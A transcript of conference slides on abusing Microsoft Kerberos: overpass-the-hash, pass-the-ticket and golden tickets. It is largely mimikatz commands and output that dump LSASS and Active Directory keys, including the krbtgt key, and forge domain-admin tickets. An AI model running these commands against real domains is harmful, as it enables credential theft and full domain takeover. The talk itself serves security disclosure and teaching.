  • 21. • Keys are both in Active Directory and client LSASS memory • We can find: – DES key – RC4 key…. Yep, this is the NTLM hash of the password, no domain salt! • Sorry Microsoft, we don’t get it, but your RFC yes ;) - http://www.ietf.org/rfc/rfc4757.txt – AES128 & AES256 keys (with NT 6) • New “protected users” group prevents Keys in client LSASS memory – Of course not on the DC ;) Kerberos :: Overpass-the-hash
  • 22. • AES Keys use PBKDF2 – These hashes are salted – 4096 iterations of the PBKDF2 algorithm – Difficult to crack • Of course these hashes are cached in memory on the client side and then used as password equivalents, just like the NT hashes • This is how you fail with strong cryptography Kerberos :: AES Keys
  • 23. • From Active Directory : Offline – “just” need : ntds.dit & SYSTEM hive – NTDSXtract : http://www.ntdsxtract.com • python dsusers.py ntds.dit.export/datatable.4 ntds.dit.export/link_table.7 ./work --name Administrateur --syshive SYSTEM --supplcreds --passwordhashes --lmoutfile ./lm --ntoutfile ./nt --pwdformat john Kerberos :: Overpass-the-hash User name: Administrateur [...] Password hashes: Administrateur:$NT$cc36cf7a8514893efccd332446158b1a::: Supplemental credentials: Kerberos newer keys salt: CHOCOLATE.LOCALAdministrateur Credentials 18 b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 17 8451bb37aa6d7ce3d2a5c2d24d317af3 3 f8fd987fa7153185
  • 24. • From Active Directory : Online Kerberos :: Overpass-the-hash mimikatz # privilege::debug Privilege '20' OK mimikatz # lsadump::lsa /inject /name:Administrateur Domain : CHOCOLATE / S-1-5-21-130452501-2365100805-3685010670 RID : 000001f4 (500) User : Administrateur * Primary LM : NTLM : cc36cf7a8514893efccd332446158b1a [...] * Kerberos-Newer-Keys Default Salt : CHOCOLATE.LOCALAdministrateur Default Iterations : 4096 Credentials aes256_hmac (4096) : b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 aes128_hmac (4096) : 8451bb37aa6d7ce3d2a5c2d24d317af3 des_cbc_md5 (4096) : f8fd987fa7153185
  • 25. • From client LSASS memory Kerberos :: Overpass-the-hash mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::ekeys Authentication Id : 0 ; 1616704 (00000000:0018ab40) Session : Interactive from 2 User Name : Administrateur Domain : CHOCOLATE SID : S-1-5-21-130452501-2365100805-3685010670-500 * Username : Administrateur * Domain : CHOCOLATE.LOCAL * Password : (null) * Key List : aes256_hmac b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 rc4_hmac_nt cc36cf7a8514893efccd332446158b1a
  • 26. • Overpass-the-hash ! – mimikatz now supports pass-the-hash for both NTLM & Kerberos provider! Kerberos :: Overpass-the-hash mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a user : Administrateur domain : chocolate.local program : cmd.exe NTLM : cc36cf7a8514893efccd332446158b1a | PID 2388 | TID 2392 | LUID 0 ; 264419 (00000000:000408e3) _ msv1_0 - data copy @ 00000000003C7BC0 : OK ! _ kerberos - data copy @ 0000000000435988 _ aes256_hmac -> null _ aes128_hmac -> null _ rc4_hmac_nt OK _ rc4_hmac_old OK _ rc4_md4 OK _ rc4_hmac_nt_exp OK _ rc4_hmac_old_exp OK _ *Password replace -> null Old pass-the-hash for NTLM protocol New pass-the-hash for Kerberos protocol
  • 27. ~ demo ! ~
  • 28. • By the way, this is exactly how Aorato POC works for changing password with just NTLM hash! – They send a Kerberos request to the service : kadmin/changepw • http://www.aorato.com/blog/active-directory-vulnerability- disclosure-weak-encryption-enables-attacker-change-victims- password-without-logged/ Kerberos :: Overpass-the-hash (more…)
  • 30. • Pass-the-Ticket Kerberos des_cbc_md5 LSASS (kerberos) for « chocolate.local » domain rc4_hmac_nt (NTLM/md4) aes128_hmac aes256_hmac KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage TGT
  • 31. • Pass-the-Ticket also with TGS! Kerberos des_cbc_md5 LSASS (kerberos) for « chocolate.local » domain rc4_hmac_nt (NTLM/md4) aes128_hmac aes256_hmac KDC KDC TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage TGS
  • 32. “Ok, Skip, Kiwi, it’s cool… but how can we find these tickets?”
  • 33. • TGT & TGS are in client LSASS memory – The “normal” way: by API • User can only export their ticket(s) (without privilege) • For TGT: AllowTgtSessionKey registry key must be set for session key export… – (mandatory to use the TGT) • For TGS: no restriction at all! – To get tickets : LsaCallAuthenticationPackage/KerbRetrieveEncodedTicketMessage • In mimikatz: kerberos::list [/export] – To pass-the-ticket : LsaCallAuthenticationPackage/KerbSubmitTicketMessage • In mimikatz: kerberos::ptt ticket.kirbi Not a hack : http://msdn.microsoft.com/library/windows/desktop/aa378099.aspx Kerberos :: TGT & TGS
  • 34. • Ok, but I want other people’s TGT & TGS ! Why do you want that? Are you a hacker? – Raw memory reading (yep, even with minidump!) – This time with all session keys Kerberos :: TGT & TGS
  • 35. • In mimikatz : – privilege::debug • (if not already SYSTEM) – sekurlsa::tickets /export • Make your choice ! • Then use it : – kerberos::ptt ticket.kirbi Kerberos :: TGT & TGS
  • 36. ~ demo ! ~
  • 37. * No encryption check for THE domain administrator (id==500) ! No worry, this account is not sensitive ;) ** Not in memory when user in « Protected Users » group Kerberos :: make your choice Default lifetime Minimum number of KDC accesses Multiple targets Available with Smartcard Realtime check for restrictions (account disabled, logon hours...) Protected Users Check for Encryption * (RC4/AES) Can be found in Is funky Normal 42 days 2 Yes Yes Yes Yes n.a. No Overpass-the-hash (Pass-the-key) 42 days 2 Yes No Yes Yes Active Directory Client Memory ** No (ok, a little;)) Pass-the-Ticket (TGT) 10 hours 1 Yes Yes No (20mn after) No Client Memory Yes Pass-the-Ticket (TGS) 10 hours 0 No Yes No No Client Memory Yes Golden Ticket 10 years 1 Yes Yes No (we can cheat) No n.a. Fuck, Yes!
  • 39. • A “Golden Ticket”, is a homemade ticket – It’s done with a lot of love – … and a key • It’s not made by the KDC, so : – it’s not limited by GPO or others settings ;) – you can push whatever you want inside! – it’s smartcard independent (sorry CISO !) Kerberos :: Golden Ticket
  • 40. • …but a golden ticket is not only about lifetime modification (10 years is hardcoded but can be modified) • Interesting part is about to modify data into, like lifetime, but mainly the Microsoft PAC : – Groups (Domain/Enterprise Admins, by example ;) – SID – Username Kerberos :: Golden Ticket
  • 41. • Kerberos is STATELESS – All account policy info is in the TGT • Disabled / Expired / outside of logon hours • Password expired • Authentication silo membership • “Protected Users” is just a group membership in the PAC • Group Membership in the PAC – This means that ALL account policy is Client Side Enforcement Kerberos :: AD Account Policy
  • 42. • Kerberos 5 has no method for the KDC/TGS (server) to validate that an account is still valid when presented with a TGT – Microsoft implemented a solution for this problem – IF the TGT is older than 20 minutes, the KDC will validate the account is still valid / enabled before issuing service tickets • We will come back to this later  Kerberos :: 20 Minute Rule
  • 43. • Even if the technique remains the same, I’ve made the choice to limit it to TGT (no TGS) – Why ? Because TGT and TGS rely on different keys – target key is renewed periodically, krbtgt… ~never  – A single TGT can obtain many TGS Kerberos :: Golden Ticket Ticket Encryption PAC KDC Signature PAC Server Signature TGT krbtgt krbtgt krbtgt TGS target krbtgt target
  • 44. • All you need is : – KDC Key (krbtgt), it can be RC4 (NTLM hash) or AES – SID of the domain (whoami, psgetsid, etc.) – Domain name Kerberos :: Golden Ticket mimikatz # lsadump::lsa /inject /name:krbtgt Domain : CHOCOLATE / S-1-5-21-130452501-2365100805-3685010670 * Primary LM : NTLM : 310b643c5316c8c3c70a10cfb17e2e31 * Kerberos-Newer-Keys Default Salt : CHOCOLATE.LOCALkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb des_cbc_md5 (4096) : 620eb39e450e6776
  • 45. • Create your own ! • kerberos::golden /domain:chocolate.local <= domain name /sid:S-1-5-21-130452501-2365100805-3685010670 <= domain SID /rc4:310b643c5316c8c3c70a10cfb17e2e31 <= NTLM hash of krbtgt /user:Administrateur <= username you wanna be /id:500 <= RID of username (500 is THE domain admin) /groups:513,512,520,518,519 <= Groups list of the user (be imaginative) /ticket:Administrateur.kirbi <= the ticket filename Kerberos :: Golden Ticket
  • 46. • Client name : Administrateur • Service name : krbtgt/chocolate.local • Validity – Start Time 07/08/2014 12:05:00 – End Time 07/08/2024 12:05:00 • … • Authorization data Microsoft (PAC) – Username : Administrateur – Domain SID • S-1-5-21-130452501-2365100805-3685010670 – User ID • 500 Administrateur – Groups ID • 512 Admins du domaine • 519 Administrateurs de l’entreprise • 518 Administrateurs du schéma • … – … Kerberos :: Golden Ticket
  • 47. • Be crazy =) – We want to have a long time access to a share limited to a user “utilisateur”, disabled. • kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:srvcharly$ <= real account always in good state /id:1001 <= RID of the real account /groups:513,1107 <= RID of “utilisateur” account, yep, in groups =) /ticket:fake_utilisateur.kirbi Kerberos :: Golden Ticket
  • 48. • Be funky =) • kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /rc4:310b643c5316c8c3c70a10cfb17e2e31 /user:badguy /id:0xffffffff /groups:513,512,520,518,519 /ticket:badguy.kirbi • Yep, both the USER and the ID don’t exist, so this TGT will only work for 20 mins (TGS watchdog) – It works if an ACL is defined with groups (this one spoofs a user in domain admins group; 512) – …but all TGS obtained in this 20 mins will be valid 10h ;) – …and you can make multiple TGT… Kerberos :: Golden Ticket
  • 49. ~ demo ! ~
  • 50. Sorry, it was the last demo ;)
  • 51. ~ Questions? ~ (if not enough time, come see us!)
  • 52. • You! To come listen us! – And trying to understand Benjamin ;) – If you are shy : exorcyst{put here @}gmail.com & benjamin{put here @}gentilkiwi.com • My co-speaker - he will recognize himself ;) • Blackhat staff ! • Microsoft – They give us a lot’s of subject for slides! – For a few years, they have worked hard to enhance a lots of things in security (and it’s not easy to mix security with retro compatibility) • Security community (sorry, we have both a big list) – Come see us for beer-time & stickers :P Thank you all !